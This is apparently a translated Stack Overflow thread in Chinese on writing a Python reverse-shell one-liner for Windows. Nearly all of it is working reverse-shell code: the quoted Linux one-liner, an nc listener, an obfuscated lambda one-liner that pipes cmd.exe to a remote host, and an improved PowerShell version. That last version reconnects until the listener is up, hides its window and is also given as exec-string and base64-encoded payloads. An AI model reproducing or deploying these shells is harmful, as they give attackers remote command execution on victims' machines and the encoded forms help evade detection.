Python windows反向shell一行

时间:2016-06-23 12:28:27

标签: python shellcode

任何人都可以帮助我使用适用于Windows的Python反向shell单线程(必须是Windows单线程)。

我正在尝试修改我曾多次使用的Linux版本,但这是我第一次使用Windows。

Linux one liner:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

取自Reverse Shell Cheat Sheet

所以这就是我迄今为止所能做到的:

C:\Python26\python.exe -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.11.0.232',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['C:\\WINDOWS\\system32\\cmd.exe','-i']);"

嗯,问题是我确实得到了一个连接,只是shell死了。任何人都知道如何解决这个问题或提供一些建议?

nc -lvnp 443
listening on [any] 443 ...
connect to [10.11.0.232] from (UNKNOWN) [10.11.1.31] 1036

因此subprocess call的参数必定是错误的。我似乎无法做到这一点。

cmd.exe的路径是正确的。我无法在cmd man page中看到任何相应的参数,例如-i

有人能指出我正确的方向吗?

编辑:在没有参数的情况下尝试进行子进程调用,但结果仍然相同。连接立即死亡。

C:\Python26\python.exe -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.11.0.232',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['C:\WINDOWS\system32\cmd.exe']);"

4 个答案:

答案 0 :(得分:4)

(@ rockstar:我想你和我正在研究同样的事情!)

不是一个班轮,但是从David Cullen的答案中学习,我把这个反向shell放在一起用于Windows。

declarations

如果有人可以将其缩减为一行,请随时编辑我的帖子或将其调整为您自己的答案......

答案 1 :(得分:2)

根据部署一个内核的方式,您可能需要指定python.exe的路径,如以下代码所示。我希望这有帮助。

C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

答案 2 :(得分:1)

来自socket.fileno()的{​​{3}}:

  

在Windows下,此方法返回的小整数不能用于可以使用文件描述符的位置(例如os.fdopen())。 Unix没有这个限制。

除非您使用的是Cygwin,否则我认为您不能在os.dup2()的Windows上使用socket.fileno()

我不认为你可以在Windows上做这个单线程,因为你需要一个带有多个语句的while循环。

答案 3 :(得分:0)

根据Mark E. Haase的回答,这是我的改进版本[​​645个字符],

  • 更小(线程现在是一线的,并且一行中的语句越多越好)
  • 不会打开新的命令窗口(shell=True
  • 支持通用换行符(text=True
  • 等待远程主机联机,如果它尚未联机(while True: try/except
  • 更可靠(p.stdin.flush(),这意味着无需填充标准输入缓冲区即可执行命令)
import os, socket, subprocess, threading, sys

def s2p(s, p):
    while True:p.stdin.write(s.recv(1024).decode()); p.stdin.flush()

def p2s(s, p):
    while True: s.send(p.stdout.read(1).encode())

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
    try: s.connect((sys.argv[1], int(sys.argv[2]))); break
    except: pass

p=subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)

threading.Thread(target=s2p, args=[s,p], daemon=True).start()

threading.Thread(target=p2s, args=[s,p], daemon=True).start()

try: p.wait()
except: s.close(); sys.exit(0)

或者作为(非常丑陋的)单层[663个字符]:

exec("""import os, socket, subprocess, threading, sys\ndef s2p(s, p):\n    while True:p.stdin.write(s.recv(1024).decode()); p.stdin.flush()\ndef p2s(s, p):\n    while True: s.send(p.stdout.read(1).encode())\ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nwhile True:\n    try: s.connect((sys.argv[1], int(sys.argv[2]))); break\n    except: pass\np=subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)\nthreading.Thread(target=s2p, args=[s,p], daemon=True).start()\nthreading.Thread(target=p2s, args=[s,p], daemon=True).start()\ntry: p.wait()\nexcept: s.close(); sys.exit(0)""")

或者作为模糊的单行[892个字符]:

import base64;exec(base64.b64decode("aW1wb3J0IG9zLCBzb2NrZXQsIHN1YnByb2Nlc3MsIHRocmVhZGluZywgc3lzCmRlZiBzMnAocywgcCk6CiAgICB3aGlsZSBUcnVlOnAuc3RkaW4ud3JpdGUocy5yZWN2KDEwMjQpLmRlY29kZSgpKTsgcC5zdGRpbi5mbHVzaCgpCmRlZiBwMnMocywgcCk6CiAgICB3aGlsZSBUcnVlOiBzLnNlbmQocC5zdGRvdXQucmVhZCgxKS5lbmNvZGUoKSkKcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCndoaWxlIFRydWU6CiAgICB0cnk6IHMuY29ubmVjdCgoc3lzLmFyZ3ZbMV0sIGludChzeXMuYXJndlsyXSkpKTsgYnJlYWsKICAgIGV4Y2VwdDogcGFzcwpwPXN1YnByb2Nlc3MuUG9wZW4oWyJwb3dlcnNoZWxsLmV4ZSJdLCBzdGRvdXQ9c3VicHJvY2Vzcy5QSVBFLCBzdGRlcnI9c3VicHJvY2Vzcy5TVERPVVQsIHN0ZGluPXN1YnByb2Nlc3MuUElQRSwgc2hlbGw9VHJ1ZSwgdGV4dD1UcnVlKQp0aHJlYWRpbmcuVGhyZWFkKHRhcmdldD1zMnAsIGFyZ3M9W3MscF0sIGRhZW1vbj1UcnVlKS5zdGFydCgpCnRocmVhZGluZy5UaHJlYWQodGFyZ2V0PXAycywgYXJncz1bcyxwXSwgZGFlbW9uPVRydWUpLnN0YXJ0KCkKdHJ5OiBwLndhaXQoKQpleGNlcHQ6IHMuY2xvc2UoKTsgc3lzLmV4aXQoMCk="))

它可以像这样直接在命令行中使用:

python -c 'exec("""import os, socket, subprocess, threading, sys\ndef s2p(s, p):\n    while True:p.stdin.write(s.recv(1024).decode()); p.stdin.flush()\ndef p2s(s, p):\n    while True: s.send(p.stdout.read(1).encode())\ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nwhile True:\n    try: s.connect((sys.argv[1], int(sys.argv[2]))); break\n    except: pass\np=subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)\nthreading.Thread(target=s2p, args=[s,p], daemon=True).start()\nthreading.Thread(target=p2s, args=[s,p], daemon=True).start()\ntry: p.wait()\nexcept: s.close(); sys.exit(0)""")'
相关问题
最新问题